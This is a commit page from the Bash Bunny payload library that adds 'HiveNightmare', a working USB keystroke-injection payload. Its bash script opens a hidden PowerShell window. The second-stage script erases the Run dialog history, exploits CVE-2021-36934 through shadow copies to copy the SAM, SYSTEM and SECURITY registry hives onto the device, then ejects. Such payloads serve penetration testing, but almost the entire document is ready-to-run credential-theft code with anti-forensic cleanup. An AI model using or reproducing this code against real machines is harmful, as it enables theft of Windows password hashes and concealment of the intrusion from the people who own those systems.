hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

New payload: HiveNightmare (#462)

Browse Source 
Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives.
This commit is contained in:
9o3 2021-08-24 21:30:47 +02:00 committed by GitHub
parent 9fdacee185
commit 605b7f1cab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 81 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
payloads/library/exfiltration/HiveNightmare/README.md Normal file
View File

@ -0,0 +1,7 @@
# HiveNightmare
Leverages CVE-202136934 to get SAM/SYSTEM/SECURITY hives.
## Options
### TRIES
> The amount of shadowcopies to search for the SAM/SYSTEM/SECURITY hives.

48
payloads/library/exfiltration/HiveNightmare/payload.txt Normal file
View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: HiveNightmare
# Description: Leverages CVE-202136934 to get SAM/SYSTEM/SECURITY hives.
# Author: 9o3
# Twitter: @BugBot4
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
#
# LED STATUS
# ==========
# SETUP.......Create stage file and loot folder
# ATTACK......Run hidden PowerShell window that gets SAM/SYSTEM/SECURITY hives using shadow copies (CVE-2021-36934)
# CLEANUP.....Remove generated files
# FINISH......Finished
#
# OPTIONS
# =======
# TRIES => Number of shadow copies to try to find SAM/SYSTEM/SECURITY hives in.
TRIES=10
######## Create stage file and loot folder ########
# Alter second stage based on settings & create loot folder if it does not yet exist. Removes previous DONE file if present.
LED SETUP
GET SWITCH_POSITION
cd /root/udisk/payloads/$SWITCH_POSITION
sed -e "s/<#TR#>/$TRIES/g" stage2.ps1 > 2
mkdir -p /root/udisk/loot/HiveNightmare
rm /root/udisk/DONE
ATTACKMODE HID STORAGE
######## Run hidden PowerShell window ########
# Run hidden PowerShell window which executes the content of the stage2.ps1 file.
LED ATTACK
RUN WIN "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
until [ -f /root/udisk/DONE ]
do
sleep 0.2
done
######## Remove generated files ########
# Removes the generated files and sync file system
LED CLEANUP
rm 2
rm /root/udisk/DONE
sync
LED FINISH

26
payloads/library/exfiltration/HiveNightmare/stage2.ps1 Normal file
View File

@ -0,0 +1,26 @@
#Remove latest run entry
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
#Set variables and create loot folder
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
$loot = $bb+"loot\HiveNightmare\";
$usr = (whoami) -replace "\\","_";
New-Item -ItemType Directory -Force -Path $loot$usr;
$i = 0;
$found = $FALSE;
while($i -lt <#TR#>) {
try {
[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SAM",$loot+$usr+"\SAM");
$found = $TRUE;
break;
} catch {$i++}
}
if($found){
[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SYSTEM",$loot+$usr+"\SYSTEM");
[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SECURITY",$loot+$usr+"\SECURITY");
}
#Let the Bash Bunny know we're done here & Eject.
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");